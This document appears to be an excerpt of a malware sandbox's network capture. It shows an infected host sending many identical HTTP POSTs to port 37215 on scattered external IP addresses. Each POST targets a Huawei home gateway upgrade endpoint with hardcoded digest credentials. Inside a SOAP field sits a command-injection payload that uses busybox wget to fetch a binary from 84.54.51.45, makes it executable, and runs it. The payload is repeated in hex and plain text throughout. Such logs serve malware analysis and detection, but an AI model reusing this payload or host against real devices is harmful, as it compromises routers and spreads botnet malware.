                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1700192.168.2.1552690197.66.111.15937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462153912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1701192.168.2.1556138197.201.1.14737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462192059 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1702192.168.2.1558998197.235.164.4937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462208033 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1703192.168.2.1551582197.16.231.3537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462234020 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1704192.168.2.1538888197.25.32.15737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462250948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1705192.168.2.1553150197.7.164.20737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462276936 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1706192.168.2.1543078197.209.158.1637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462290049 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1707192.168.2.1548532197.111.144.3337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462297916 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1708192.168.2.1536106197.81.84.8337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462321043 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1709192.168.2.1534794197.212.214.7837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462333918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
